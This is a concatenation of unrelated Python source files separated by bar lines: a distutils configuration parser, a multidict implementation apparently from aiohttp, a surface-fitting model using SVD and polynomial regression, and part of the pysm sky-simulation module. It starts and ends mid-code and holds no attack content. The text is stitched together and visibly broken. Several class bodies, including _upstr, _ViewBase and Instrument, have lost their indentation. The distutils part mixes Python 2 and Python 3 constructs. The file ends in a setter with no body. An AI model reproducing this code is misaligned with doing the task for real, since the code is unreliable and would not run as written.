    that varies across Unices and is stored in Python's Makefile.
    """
    # Only Unix compilers are driven by Makefile settings.
    if compiler.compiler_type != "unix":
        return
    cc, opt, ccshared, ldshared, so_ext = \
        get_config_vars('CC', 'OPT', 'CCSHARED', 'LDSHARED', 'SO')
    # Base command shared by plain and shared-object compilation.
    cc_cmd = cc + ' ' + opt
    compiler.set_executables(
        preprocessor=cc + " -E",    # not always!
        compiler=cc_cmd,
        compiler_so=cc_cmd + ' ' + ccshared,
        linker_so=ldshared,
        linker_exe=cc)
    compiler.shared_lib_extension = so_ext
def get_config_h_filename():
    """Return full pathname of installed config.h file."""
    # During a source build the header sits in the current directory.
    if python_build:
        inc_dir = '.'
    else:
        inc_dir = get_python_inc(plat_specific=1)
    return os.path.join(inc_dir, "config.h")
def get_makefile_filename():
    """Return full pathname of installed Makefile from the Python build."""
    # Source builds keep the Makefile at the top of the tree.
    if python_build:
        return './Makefile'
    return os.path.join(get_python_lib(plat_specific=1, standard_lib=1),
                        "config", "Makefile")
def parse_config_h(fp, g=None):
    """Parse a config.h-style file.
    A dictionary containing name/value pairs is returned.  If an
    optional dictionary is passed in as the second argument, it is
    used instead of a new dictionary.
    """
    if g is None:
        g = {}
    define_rx = re.compile("#define ([A-Z][A-Z0-9_]+) (.*)\n")
    undef_rx = re.compile("/[*] #undef ([A-Z][A-Z0-9_]+) [*]/\n")
    #
    while 1:
        line = fp.readline()
        if not line:
            break
        m = define_rx.match(line)
        if m:
            n, v = m.group(1, 2)
            # int() replaces string.atoi(), which was removed in Python 3;
            # both parse base-10 literals and raise ValueError otherwise.
            try: v = int(v)
            except ValueError: pass
            g[n] = v
        else:
            m = undef_rx.match(line)
            if m:
                # "#undef NAME" entries are recorded as 0.
                g[m.group(1)] = 0
    return g
# Regexes needed for parsing Makefile (and similar syntaxes,
# like old-style Setup files).
_variable_rx = re.compile("([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)")
_findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)")
_findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}")
def parse_makefile(fn, g=None):
    """Parse a Makefile-style file.
    A dictionary containing name/value pairs is returned.  If an
    optional dictionary is passed in as the second argument, it is
    used instead of a new dictionary.
    """
    from distutils.text_file import TextFile
    # TextFile strips comments, skips blanks and joins continuation lines.
    fp = TextFile(fn, strip_comments=1, skip_blanks=1, join_lines=1)
    if g is None:
        g = {}
    # done: fully resolved variables; notdone: values still containing
    # $(VAR)/${VAR} references that need interpolation.
    done = {}
    notdone = {}
    while 1:
        line = fp.readline()
        if line is None: # eof
            break
        m = _variable_rx.match(line)
        if m:
            n, v = m.group(1, 2)
            v = string.strip(v)
            if "$" in v:
                notdone[n] = v
            else:
                # Store integer-looking values as ints (py2 string.atoi).
                try: v = string.atoi(v)
                except ValueError: pass
                done[n] = v
    # do variable interpolation here
    while notdone:
        for name in notdone.keys():
            value = notdone[name]
            m = _findvar1_rx.search(value) or _findvar2_rx.search(value)
            if m:
                n = m.group(1)
                if done.has_key(n):
                    # Referenced variable already resolved: substitute it.
                    after = value[m.end():]
                    value = value[:m.start()] + str(done[n]) + after
                    if "$" in after:
                        notdone[name] = value
                    else:
                        try: value = string.atoi(value)
                        except ValueError:
                            done[name] = string.strip(value)
                        else:
                            done[name] = value
                        del notdone[name]
                elif notdone.has_key(n):
                    # get it on a subsequent round
                    pass
                else:
                    # Unknown variable: expands to the empty string.
                    done[n] = ""
                    after = value[m.end():]
                    value = value[:m.start()] + after
                    if "$" in after:
                        notdone[name] = value
                    else:
                        try: value = string.atoi(value)
                        except ValueError:
                            done[name] = string.strip(value)
                        else:
                            done[name] = value
                        del notdone[name]
            else:
                # bogus variable reference; just drop it since we can't deal
                del notdone[name]
    fp.close()
    # save the results in the global dictionary
    g.update(done)
    return g
def expand_makefile_vars(s, vars):
    """Expand Makefile-style variables -- "${foo}" or "$(foo)" -- in
    's' according to 'vars' (a dictionary mapping variable names to
    values).  Variables not present in 'vars' are silently expanded to the
    empty string.  The variable values in 'vars' should not contain further
    variable expansions; if 'vars' is the output of 'parse_makefile()',
    you're fine.  Returns a variable-expanded version of 's'.
    """
    # This algorithm does multiple expansion, so if vars['foo'] contains
    # "${bar}", it will expand ${foo} to ${bar}, and then expand
    # ${bar}... and so forth.  This is fine as long as 'vars' comes from
    # 'parse_makefile()', which takes care of such expansions eagerly,
    # according to make's variable expansion semantics.
    while 1:
        m = _findvar1_rx.search(s) or _findvar2_rx.search(s)
        if m:
            name = m.group(1)
            (beg, end) = m.span()
            # BUG FIX: default to "" so unknown variables expand to the
            # empty string (as documented) instead of raising TypeError
            # from concatenating None.
            s = s[0:beg] + vars.get(name, "") + s[end:]
        else:
            break
    return s
_config_vars = None
def _init_posix():
    """Initialize the module as appropriate for POSIX systems."""
    g = {}
    # load the installed Makefile:
    try:
        filename = get_makefile_filename()
        parse_makefile(filename, g)
    except IOError, msg:
        # Python 2 'except E, v' syntax: this is a legacy module.
        my_msg = "invalid Python installation: unable to open %s" % filename
        if hasattr(msg, "strerror"):
            my_msg = my_msg + " (%s)" % msg.strerror
        raise DistutilsPlatformError, my_msg
    # On AIX, there are wrong paths to the linker scripts in the Makefile
    # -- these paths are relative to the Python source, but when installed
    # the scripts are in another directory.
    if python_build:
        g['LDSHARED'] = g['BLDSHARED']
    # Publish the parsed variables as the module-level cache.
    global _config_vars
    _config_vars = g
def _init_nt():
    """Initialize the module as appropriate for NT"""
    global _config_vars
    g = {}
    # set basic install directories
    g['LIBDEST'] = get_python_lib(plat_specific=0, standard_lib=1)
    g['BINLIBDEST'] = get_python_lib(plat_specific=1, standard_lib=1)
    # XXX hmmm.. a normal install puts include files here
    g['INCLUDEPY'] = get_python_inc(plat_specific=0)
    # Windows extension-module and executable suffixes.
    g['SO'] = '.pyd'
    g['EXE'] = ".exe"
    _config_vars = g
def _init_mac():
    """Initialize the module as appropriate for Macintosh systems"""
    global _config_vars
    g = {}
    # set basic install directories
    g['LIBDEST'] = get_python_lib(plat_specific=0, standard_lib=1)
    g['BINLIBDEST'] = get_python_lib(plat_specific=1, standard_lib=1)
    # XXX hmmm.. a normal install puts include files here
    g['INCLUDEPY'] = get_python_inc(plat_specific=0)
    # Classic MacOS shared-library suffix.
    g['SO'] = '.ppc.slb'
    # XXX are these used anywhere?
    g['install_lib'] = os.path.join(EXEC_PREFIX, "Lib")
    g['install_platlib'] = os.path.join(EXEC_PREFIX, "Mac", "Lib")
    _config_vars = g
def get_config_vars(*args):
    """With no arguments, return a dictionary of all configuration
    variables relevant for the current platform.  Generally this includes
    everything needed to build extensions and install both pure modules and
    extensions.  On Unix, this means every variable defined in Python's
    installed Makefile; on Windows and Mac OS it's a much smaller set.
    With arguments, return a list of values that result from looking up
    each argument in the configuration variable dictionary.
    """
    global _config_vars
    if _config_vars is None:
        # Lazily populate the cache with the platform-specific loader
        # (_init_posix/_init_nt/_init_mac) when one exists.
        initializer = globals().get("_init_" + os.name)
        if initializer:
            initializer()
        else:
            _config_vars = {}
        # Normalized versions of prefix and exec_prefix are handy to have;
        # in fact, these are the standard versions used most places in the
        # Distutils.
        _config_vars['prefix'] = PREFIX
        _config_vars['exec_prefix'] = EXEC_PREFIX
    if not args:
        return _config_vars
    return [_config_vars.get(name) for name in args]
def get_config_var(name):
    """Return the value of a single variable using the dictionary
    returned by 'get_config_vars()'.  Equivalent to
      get_config_vars().get(name)
    """
    # Missing names yield None rather than raising.
    return get_config_vars().get(name)
|
|
"""Multidict implementation.
HTTP Headers and URL query string require specific data structure:
multidict. It behaves mostly like a dict but it can have
several values for the same key.
"""
from collections import abc
import os
import sys
# Public API: the underscore-free names are bound at the bottom of the
# module, either to the C-extension versions or to the pure-Python
# fallbacks defined below.
__all__ = ('MultiDictProxy', 'CIMultiDictProxy',
           'MultiDict', 'CIMultiDict', 'upstr')
# Sentinel distinguishing "no default supplied" from an explicit None.
_marker = object()
class _upstr(str):
"""Case insensitive str."""
def __new__(cls, val='',
encoding=sys.getdefaultencoding(), errors='strict'):
if isinstance(val, (bytes, bytearray, memoryview)):
val = str(val, encoding, errors)
elif isinstance(val, str):
pass
else:
val = str(val)
val = val.upper()
return str.__new__(cls, val)
def upper(self):
return self
class _Base:
    """Read-only behaviour shared by the multidicts and their proxies.

    Subclasses provide ``self._items``, a list of (key, value) pairs in
    insertion order.
    """
    def getall(self, key, default=_marker):
        """Return a list of all values matching the key."""
        found = [v for k, v in self._items if k == key]
        if found:
            return found
        if default is not _marker:
            return default
        raise KeyError('Key not found: %r' % key)
    def getone(self, key, default=_marker):
        """Get first value matching the key."""
        for stored_key, value in self._items:
            if stored_key == key:
                return value
        if default is not _marker:
            return default
        raise KeyError('Key not found: %r' % key)
    # Mapping interface #
    def __getitem__(self, key):
        # _marker default means a missing key raises KeyError.
        return self.getone(key, _marker)
    def get(self, key, default=None):
        """Get first value matching the key.
        The method is alias for .getone().
        """
        return self.getone(key, default)
    def __iter__(self):
        return iter(self.keys())
    def __len__(self):
        return len(self._items)
    def keys(self):
        """Return a new view of the dictionary's keys."""
        return _KeysView(self._items)
    def items(self):
        """Return a new view of the dictionary's items *(key, value) pairs)."""
        return _ItemsView(self._items)
    def values(self):
        """Return a new view of the dictionary's values."""
        return _ValuesView(self._items)
    def __eq__(self, other):
        if not isinstance(other, abc.Mapping):
            return NotImplemented
        if isinstance(other, _Base):
            # Same internal layout: compare pair lists directly.
            return self._items == other._items
        for key, value in self.items():
            if value != other.get(key, _marker):
                return False
        return True
    def __contains__(self, key):
        return any(stored_key == key for stored_key, _ in self._items)
    def __repr__(self):
        pairs = ("'{}': {!r}".format(k, v) for k, v in self.items())
        return '<{} {{{}}}>'.format(self.__class__.__name__, ', '.join(pairs))
class _CIBase(_Base):
    """Case-insensitive lookups: every incoming key is folded with
    ``.upper()`` before delegating to _Base, matching how keys are
    stored by the CI containers."""
    def getall(self, key, default=_marker):
        """Return a list of all values matching the key."""
        folded = key.upper()
        return super().getall(folded, default)
    def getone(self, key, default=_marker):
        """Get first value matching the key."""
        folded = key.upper()
        return super().getone(folded, default)
    def get(self, key, default=None):
        """Get first value matching the key.
        The method is alias for .getone().
        """
        return super().get(key.upper(), default)
    def __getitem__(self, key):
        return super().__getitem__(key.upper())
    def __contains__(self, key):
        return super().__contains__(key.upper())
class _MultiDictProxy(_Base, abc.Mapping):
    """Read-only mapping view sharing the items of a _MultiDict."""
    def __init__(self, arg):
        if not isinstance(arg, _MultiDict):
            msg = 'MultiDictProxy requires MultiDict instance, not {}'.format(
                type(arg))
            raise TypeError(msg)
        # Share (not copy) the underlying pair list, so the proxy always
        # reflects the wrapped dict's current contents.
        self._items = arg._items
    def copy(self):
        """Return a copy of itself."""
        return _MultiDict(self.items())
class _CIMultiDictProxy(_CIBase, _MultiDictProxy):
    """Read-only, case-insensitive view over a _CIMultiDict."""
    def __init__(self, arg):
        if not isinstance(arg, _CIMultiDict):
            msg = ('CIMultiDictProxy requires CIMultiDict instance, not {}'
                   .format(type(arg)))
            raise TypeError(msg)
        # Share the wrapped dict's live pair list.
        self._items = arg._items
    def copy(self):
        """Return a copy of itself."""
        return _CIMultiDict(self.items())
class _MultiDict(_Base, abc.MutableMapping):
    # Mutable multidict: keeps (key, value) pairs in insertion order and
    # allows several values for the same key.
    def __init__(self, *args, **kwargs):
        self._items = []
        self._extend(args, kwargs, self.__class__.__name__, self.add)
    def add(self, key, value):
        """Add the key and value, not overwriting any previous value."""
        self._items.append((key, value))
    def copy(self):
        """Return a copy of itself."""
        cls = self.__class__
        return cls(self.items())
    def extend(self, *args, **kwargs):
        """Extend current MultiDict with more values.
        This method must be used instead of update.
        """
        self._extend(args, kwargs, 'extend', self.add)
    def _extend(self, args, kwargs, name, method):
        # Shared machinery behind __init__/extend/update; 'method' is
        # self.add (keep duplicates) or self._replace (overwrite keys).
        if len(args) > 1:
            raise TypeError("{} takes at most 1 positional argument"
                            " ({} given)".format(name, len(args)))
        if args:
            arg = args[0]
            # Fast paths: reuse the internal pair list of other multidicts.
            if isinstance(args[0], _MultiDictProxy):
                items = arg._items
            elif isinstance(args[0], _MultiDict):
                items = arg._items
            elif hasattr(arg, 'items'):
                items = arg.items()
            else:
                # Otherwise expect an iterable of 2-element pairs.
                for item in arg:
                    if not len(item) == 2:
                        raise TypeError(
                            "{} takes either dict or list of (key, value) "
                            "tuples".format(name))
                items = arg
            for key, value in items:
                method(key, value)
        for key, value in kwargs.items():
            method(key, value)
    def clear(self):
        """Remove all items from MultiDict."""
        self._items.clear()
    # Mapping interface #
    def __setitem__(self, key, value):
        self._replace(key, value)
    def __delitem__(self, key):
        # Delete *all* pairs with this key; iterating backwards keeps the
        # remaining indices valid as entries are removed.
        items = self._items
        found = False
        for i in range(len(items) - 1, -1, -1):
            if items[i][0] == key:
                del items[i]
                found = True
        if not found:
            raise KeyError(key)
    def setdefault(self, key, default=None):
        """Return value for key, set value to default if key is not present."""
        for k, v in self._items:
            if k == key:
                return v
        self._items.append((key, default))
        return default
    def pop(self, key, default=_marker):
        """Remove specified key and return the corresponding value.
        If key is not found, d is returned if given, otherwise
        KeyError is raised.
        """
        # NOTE(review): removes every pair with this key; because the scan
        # runs backwards, 'value' ends up holding the first occurrence.
        value = None
        found = False
        for i in range(len(self._items) - 1, -1, -1):
            if self._items[i][0] == key:
                value = self._items[i][1]
                del self._items[i]
                found = True
        if not found:
            if default is _marker:
                raise KeyError(key)
            else:
                return default
        else:
            return value
    def popitem(self):
        """Remove and return an arbitrary (key, value) pair."""
        # "Arbitrary" is in fact the oldest (first-inserted) pair.
        if self._items:
            return self._items.pop(0)
        else:
            raise KeyError("empty multidict")
    def update(self, *args, **kwargs):
        """Update the dictionary from *other*, overwriting existing keys."""
        self._extend(args, kwargs, 'update', self._replace)
    def _replace(self, key, value):
        # Drop every existing pair for the key, then append the new one.
        if key in self:
            del self[key]
        self.add(key, value)
class _CIMultiDict(_CIBase, _MultiDict):
    """Mutable multidict whose keys are folded to upper case on every
    write, so lookups are case-insensitive."""
    def add(self, key, value):
        """Add the key and value, not overwriting any previous value."""
        super().add(key.upper(), value)
    def __setitem__(self, key, value):
        super().__setitem__(key.upper(), value)
    def __delitem__(self, key):
        super().__delitem__(key.upper())
    def _replace(self, key, value):
        super()._replace(key.upper(), value)
    def setdefault(self, key, default=None):
        """Return value for key, set value to default if key is not present."""
        return super().setdefault(key.upper(), default)
class _ViewBase:
def __init__(self, items):
self._items = items
def __len__(self):
return len(self._items)
def __repr__(self):
return '{0.__class__.__name__}({0._items!r})'.format(self)
class _ItemsView(_ViewBase, abc.ItemsView):
    """View of the (key, value) pairs."""
    def __contains__(self, item):
        # Only 2-element sequences can possibly be items.
        # NOTE(review): assert-based validation vanishes under python -O.
        assert isinstance(item, (tuple, list))
        assert len(item) == 2
        return item in self._items
    def __iter__(self):
        return iter(self._items)
class _ValuesView(_ViewBase, abc.ValuesView):
    """View of the values, in insertion order."""
    def __contains__(self, value):
        return any(pair[1] == value for pair in self._items)
    def __iter__(self):
        return (pair[1] for pair in self._items)
class _KeysView(_ViewBase, abc.KeysView):
    """View of the keys, in insertion order (duplicates included)."""
    def __contains__(self, key):
        return any(pair[0] == key for pair in self._items)
    def __iter__(self):
        return (pair[0] for pair in self._items)
# Bind the public names: use the pure-Python implementations above when
# extensions are explicitly disabled via AIOHTTP_NO_EXTENSIONS; otherwise
# prefer the C-extension versions, falling back to pure Python when the
# compiled module is unavailable.
if bool(os.environ.get('AIOHTTP_NO_EXTENSIONS')):
    MultiDictProxy = _MultiDictProxy
    CIMultiDictProxy = _CIMultiDictProxy
    MultiDict = _MultiDict
    CIMultiDict = _CIMultiDict
    upstr = _upstr
else:
    try:
        from ._multidict import (MultiDictProxy,
                                 CIMultiDictProxy,
                                 MultiDict,
                                 CIMultiDict,
                                 upstr)
    except ImportError: # pragma: no cover
        MultiDictProxy = _MultiDictProxy
        CIMultiDictProxy = _CIMultiDictProxy
        MultiDict = _MultiDict
        CIMultiDict = _CIMultiDict
        upstr = _upstr
|
|
# Author: Jean-Remi King <jeanremi.king@gmail.com>
import numpy as np
from scipy import optimize
from scipy.spatial.distance import squareform, pdist
from sklearn.preprocessing import PolynomialFeatures
class ModelDisplacement(object):
    """Transformer to fit rigid object rotation + translation. It 1) centers
    the data, 2) rotates it with SVD, and 3) fits translation to solve:
        R * X + t = Y
    """
    # Adapted from Nghia Ho <http://nghiaho.com/?page_id=671>
    # NOTE: rewritten on plain ndarrays with the ``@`` operator because
    # ``np.mat``/``np.matrix`` is deprecated and the ``np.mat`` alias was
    # removed in NumPy 2.0. Shapes and numerical results are unchanged;
    # attributes are ndarrays instead of matrices.
    def fit(self, X, Y):
        """Fit the forward (X -> Y) and inverse (Y -> X) displacements.
        Parameters
        ==========
        X : array-like, shape(n_points, 3)
            Points source locations (2D inputs are padded to 3D by the
            caller, e.g. ModelSurface._check_input).
        Y : array-like, shape(n_points, 3)
            Points target locations.
        Attributes
        ==========
        R_ : np.ndarray, shape(3, 3)
            Rotation matrix of f(X, Y) solved with SVD.
        t_ : np.ndarray, shape(3, 1)
            Translation vector of f(X, Y) solved after SVD.
        inv_R_ : np.ndarray, shape(3, 3)
            Rotation matrix of f(Y, X) solved with SVD.
        inv_t_ : np.ndarray, shape(3, 1)
            Translation vector of f(Y, X) solved after SVD.
        """
        self.R_, self.t_ = self._fit(X, Y)
        self.inv_R_, self.inv_t_ = self._fit(Y, X)  # XXX should be analytical!
    def _fit(self, X, Y):
        # Solve the orthogonal Procrustes problem R @ X + t = Y (Kabsch).
        X = np.asarray(X, dtype=float)
        Y = np.asarray(Y, dtype=float)
        # Center both point clouds; keepdims gives (1, 3) row centroids.
        centroid_X = X.mean(axis=0, keepdims=True)
        centroid_Y = Y.mean(axis=0, keepdims=True)
        XX = X - centroid_X
        YY = Y - centroid_Y
        # Fit rotation through SVD of the cross-covariance matrix.
        H = XX.T @ YY
        U, S, Vt = np.linalg.svd(H)
        R_ = Vt.T @ U.T
        # Special reflection case: force a proper rotation (det = +1).
        if np.linalg.det(R_) < 0:
            Vt[2, :] *= -1
            R_ = Vt.T @ U.T
        # Fit translation once the rotation is known; shape (3, 1).
        t_ = -R_ @ centroid_X.T + centroid_Y.T
        return R_, t_
    def transform(self, X):
        """Apply the fitted displacement R @ X + t.
        Parameters
        ==========
        X : array-like, shape(n_points, 3)
            All points locations.
        Returns
        =======
        Y : np.array, shape(n_points, 3)
            Rotated + translated X
        """
        X = np.asarray(X, dtype=float)
        # (3, 1) translation broadcasts over the n_points columns.
        y_pred = self.R_ @ X.T + self.t_
        return np.array(y_pred.T)
    def inverse_transform(self, X):
        """Apply the inverse displacement fitted on (Y, X)."""
        X = np.asarray(X, dtype=float)
        y_pred = self.inv_R_ @ X.T + self.inv_t_
        return np.array(y_pred.T)
    def fit_transform(self, X, Y):
        """ Fits R*X + t = Y and return predicted X.
        Parameters
        ==========
        X : array-like, shape(n_points, 3)
            All points locations.
        Returns
        =======
        Y : np.array, shape(n_points, 3)
            Rotated + translated X
        """
        self.fit(X, Y)
        # BUG FIX: the original called the misspelled self.t_ransform(X),
        # which raised AttributeError on every call.
        return np.array(self.transform(X))
class ModelSurface(object):
    """Fits a surface for which we know:
    - a small set (`idx`) of points 3D locations (`y`)
    - all 2D distances of the points (`X`)
    by successively using a rotation fit, translation fit, polynomial fit with
    a constrain on the points close distances.
    Parameters
    =========
    alpha : float, in [0, 1]
        Constrain parameter. If alpha = 1 the polynomial is fully constrained
        by the known 2D distances (rigid surface). If 0, the 2D distance is
        relaxed (more curvature).
    degree : int
        Degree of the polynomial fit.
    """
    def __init__(self, alpha=.5, degree=2, verbose='debug'):
        # verbose == 'debug' makes _loss print its two error terms on
        # every objective evaluation.
        self.degree = degree
        self.alpha = alpha
        self.verbose = verbose
    def fit(self, X, y, idx):
        """Fit the surface to the known 3D points.
        Parameters
        ==========
        X : np.matrix, shape(n_points, 2)
            All points 2D locations.
        y : np.matrix, shape(n_known, 3)
            Subselection of known points 3D locations.
        idx : list | np.array, shape(n_known,)
            Indices indicating which are the known points.
        Attributes
        ==========
        R_ : np.matrix, shape(3, 3)
            Rotation matrix solved with SVD.
        t_ : np.matrix, shape(1, 3)
            Translation vector solved after SVD.
        coefs_ : np.matrix, shape(3, n_polynomes)
            Polynomial coefficients.
        """
        X = self._check_input(X)
        y = self._check_input(y)
        # Fit Translation and rotation
        self._displacer = ModelDisplacement()
        self._displacer.fit(X[idx], y)
        # It's computationally easier to rotate y, so that we only computes
        # the X polynomial once.
        y_displaced = self._displacer.inverse_transform(y)
        # Compute X polynomial bases
        X_poly = PolynomialFeatures(self.degree).fit_transform(X)
        n_coefs = X_poly.shape[1]
        # Compute distance and neighbors on the 2D grid once
        dist_2D = squareform(pdist(X))
        # normalize distance constrain by distance, add one to avoid / 0
        weights = 1 + dist_2D ** 2
        # Let's initialize from a flat grid since it's the most likely
        # For this we'll put x=1, y=1, z=1
        x0 = np.hstack((np.zeros((3, 1)),
                        np.identity(3),
                        np.zeros((3, n_coefs - 4)))).ravel()
        # Avoid 0. for numerical issues
        x0 += np.random.randn(*x0.shape) / 1000
        # NOTE(review): x0 is jittered with an unseeded np.random, so fits
        # are not reproducible run-to-run -- confirm this is intended.
        coefs_ = optimize.fmin_bfgs(self._loss, x0=x0, gtol=.01,
                                    args=(X_poly, y_displaced, idx, dist_2D,
                                          self.alpha, weights))
        self.coefs_ = coefs_
    @property
    def R_(self):
        # Rotation estimated by the internal ModelDisplacement.
        return self._displacer.R_
    @property
    def t_(self):
        # Translation estimated by the internal ModelDisplacement.
        return self._displacer.t_
    def _check_input(self, X):
        """Transforms 2D to 3D"""
        # Pads a zero z-column so 2D inputs become 3D points.
        X = np.array(X)
        if X.ndim == 1:
            X = X[:, None]
        if X.shape[1] == 2:
            X = np.hstack((X, np.zeros((len(X), 1))))
        return X
    def predict(self, X):
        """Predicts the 3D location of from the 2D location.
        Parameters
        ==========
        X : np.matrix, shape(n_points, 2)
            Known 2D locations.
        Returns
        =======
        Y: np.array, shape(n_points, 3)
            Predicted 3D locations.
        """
        X = self._check_input(X)
        # compute polynomial
        X_poly = PolynomialFeatures(self.degree).fit_transform(X)
        # Combine polynomials
        coefs = self.coefs_.reshape([3, -1])
        y_pred = np.dot(coefs, X_poly.T).T
        # Rotate and translate
        return self._displacer.transform(np.array(y_pred))
    def _loss(self, coefs, X_poly, y_displaced, idx, dist_2D, alpha, weights):
        """Least Square Regression on polynomial bases constrained with
        known 2D distances"""
        coefs = coefs.reshape([3, -1])
        y_pred = np.dot(coefs, X_poly.T).T
        # Compute error with known points
        y_error = np.linalg.norm(y_pred[idx, :] - y_displaced)
        # Compute points distance on polynomial
        dist_3D = squareform(pdist(y_pred))
        # Compute distance difference weighted by the distance
        dist = np.sqrt(np.sum((dist_3D - dist_2D) ** 2 / weights))
        if self.verbose == 'debug':
            print(y_error, dist)
        return (1 - alpha) * y_error + alpha * dist
|
|
"""
.. module:: pysm
:platform: Unix
:synopsis: module containing primary use classes Sky and Instrument.
.. moduleauthor: Ben Thorne <ben.thorne@physics.ox.ac.uk>
"""
from __future__ import absolute_import, print_function
from scipy import interpolate, integrate
import numpy as np
import healpy as hp
import scipy.constants as constants
import os, sys
from .components import Dust, Synchrotron, Freefree, AME, CMB
from .common import read_key, convert_units, bandpass_convert_units, check_lengths, write_map, build_full_map
class Sky(object):
    """Model sky signal of Galactic foregrounds.
    This class combines the contributions to the Galactic microwave
    foreground from thermal dust, synchrotron, AME, free-free, and CMB
    emissions.
    It is initialised using a dictionary. The keys must be 'cmb',
    'dust', 'synchrotron', 'freefree', 'ame', and the values must be
    dictionaries with the configuration of the named component, e.g.:
    cmb_config = {
        'model' : 'taylens',
        'cmb_specs' : np.loadtxt('pysm/template/camb_lenspotentialCls.dat', unpack = True),
        'delens' : False,
        'delensing_ells' : np.loadtxt('pysm/template/delens_ells.txt'),
        'nside' : nside,
        'cmb_seed' : 1111
    }
    dust_config = {
        'model' : 'modified_black_body',
        'nu_0_I' : 545.,
        'nu_0_P' : 353.,
        'A_I' : pysm.read_map('pysm/template/dust_t_new.fits', nside, field = 0),
        'A_Q' : pysm.read_map('pysm/template/dust_q_new.fits', nside, field = 0),
        'A_U' : pysm.read_map('pysm/template/dust_u_new.fits', nside, field = 0),
        'spectral_index' : 1.5,
        'temp' : pysm.read_map('pysm/template/dust_temp.fits', nside, field = 0)
    }
    sky_config = {
        'cmb' : cmb_config,
        'dust': dust_config,
    }
    """
    def __init__(self, config, mpi_comm=None):
        """Read the configuration dict for Sky
        Implement the configuration file for the Sky instance. Then
        define the getattributes corresponding to the requested
        components.
        """
        # Name-mangled private storage, exposed via the read-only
        # Config / Components properties below.
        self.__config = config
        self.__components = list(config.keys())
        if 'cmb' in self.Components:
            self.cmb = component_adder(CMB, self.Config['cmb'])
        self.Uses_HD17 = False
        if 'dust' in self.Components:
            self.dust = component_adder(Dust, self.Config['dust'], mpi_comm=mpi_comm)
            # Here we add an exception for the HD_17 model. This model requires that for bandpass
            # integration the model be initialised knowing the bandpass specification, rather than
            # just individual frequencies. Therefore we need to be able to call the model directly
            # during the bandpass evaluation.
            # NOTE(review): the [0] subscript implies Config['dust'] is a
            # sequence of config dicts, unlike the docstring example --
            # confirm against component_adder.
            if self.Config['dust'][0]['model'] == 'hensley_draine_2017':
                self.Uses_HD17 = True
                self.HD_17_bpass = initialise_hd_dust_model_bandpass(self.dust, mpi_comm=mpi_comm, **self.Config['dust'][0])
        if 'synchrotron' in self.Components:
            self.synchrotron = component_adder(Synchrotron, self.Config['synchrotron'])
        if 'freefree' in self.Components:
            self.freefree = component_adder(Freefree, self.Config['freefree'])
        if 'ame' in self.Components:
            self.ame = component_adder(AME, self.Config['ame'])
        return
    @property
    def Uses_HD17(self):
        # True when the hensley_draine_2017 dust model is configured.
        return self.__uses_hd17
    @Uses_HD17.setter
    def Uses_HD17(self, value):
        self.__uses_hd17 = value
    @property
    def Config(self):
        try:
            return self.__config
        except AttributeError:
            # NOTE(review): print + sys.exit on a missing attribute is
            # abrupt for library code; raising would be kinder to callers.
            print("Sky attribute 'Config' not set.")
            sys.exit(1)
    @property
    def Components(self):
        try:
            return self.__components
        except AttributeError:
            print("Sky attribute 'Components' not set.")
            sys.exit(1)
    def signal(self, **kwargs):
        """Returns the sky as a function of frequency.
        This returns a function which is the sum of all the requested
        sky components at the given frequency: (T, Q, U)(nu)."""
        def signal(nu):
            # Sum the emission of every configured component at nu.
            sig = 0.
            for component in self.Components:
                sig += getattr(self, component)(nu, **kwargs)
            return sig
        return signal
    def add_component(self, name, component):
        """Add a already initialized component object to the sky
        Parameters
        ==========
        name : str
            name of the new component, it cannot include spaces or commas
        component : object
            object that provides a signal(nu, **kwargs) function that returns the emission in uK_RJ
        """
        self.__components.append(name)
        setattr(self, name, component.signal)
class Instrument(object):
"""This class contains the attributes and methods required to model
the instrument observing Sky.
Instrument contains methods used to perform bandpass integration over an arbitrary bandpass, smooth with a Gaussian beam, and a white Gaussian noise component.
Instrument is initialised with dictionary, the possible keys are:
- `frequencies` : frequencies at which to evaluate the Sky model -- numpy.ndarray.
- `use_smoothing` : whether or not to use smoothing -- bool.
- `beams` : Gaussian beam FWHMs in arcmin. Only used if use_smoothing is True. Must be the same length as frequencies.
- `add_noise` : whether or not to add noise -- bool
- `sens_I` : sensitivity of intensity in uK_RJamin. Only used if add_noise is True. Must be same length as frequencies -- numpy.ndarray
- `sens_P` : sensitivity of polarisation in uK_RJamin. Only used if add_noise is True. Must be same length as frequencies -- numpy.ndarray
- `nside` : nside at which to evaluate maps -- int.
- `noise_seed` : noise seed -- int.
- `use_bandpass` : whether or not to use bandpass. If this is True `frequencies` is not required -- bool
- `channels` : frequencies and weights of channels to be calculated as a list of tuples [(frequencies_1, weights_1), (frequencies_2, weights_2) ...] -- list of tuples
- `channel_names` : list of names used to label the files to which channel maps are written -- string.
- `output_directory` : directory to which the files will be written -- str.
- `output_prefix` : prefix for all output files -- str.
- `output_units` : output units -- str
The use of Instrument is with the :class:`pysm.pysm.Sky` class. Given an instance of Sky we can use the :meth:`pysm.pysm.Instrument.obseve` to apply instrumental effects:
>>> sky = pysm.Sky(sky_config)
>>> instrument = pysm.Instrument(instrument_config)
>>> instrument.observe(sky)
"""
def __init__(self, config):
    """Populate the Instrument attributes from a configuration dictionary."""
    for key in config:
        read_key(self, key, config)
    # The number of observation channels depends on whether a real
    # bandpass or a set of delta frequencies was configured.
    if self.Use_Bandpass:
        N_channels = len(self.Channels)
        # Normalise the bandpass weights while we are at it.
        self.normalise_bandpass()
    else:
        N_channels = len(self.Frequencies)
    # Unspecified beams / sensitivities default to zero, i.e.
    # perfect-resolution and noiseless observations respectively.
    if not self.Use_Smoothing:
        self.Beams = np.zeros(N_channels)
    if not self.Add_Noise:
        self.Sens_I = np.zeros(N_channels)
        self.Sens_P = np.zeros(N_channels)
@property
def Frequencies(self):
    """Frequencies (GHz) at which the sky is evaluated; exits if never set."""
    try:
        freqs = self.__frequencies
    except AttributeError:
        print("Instrument attribute 'Frequencies' not set.")
        sys.exit(1)
    return freqs
@property
def Channels(self):
    """List of (frequencies, weights) tuples, one per channel; exits if never set."""
    try:
        channels = self.__channels
    except AttributeError:
        print("Instrument attribute 'Channels' not set.")
        sys.exit(1)
    return channels
@Channels.setter
def Channels(self, value):
    # Stored under the name-mangled private attribute read by the getter.
    self.__channels = value
@property
def Beams(self):
    """Gaussian beam FWHMs in arcmin; exits if never set."""
    try:
        beams = self.__beams
    except AttributeError:
        print("Instrument attribute 'Beams' not set.")
        sys.exit(1)
    return beams
@Beams.setter
def Beams(self, value):
    # Stored under the name-mangled private attribute read by the getter.
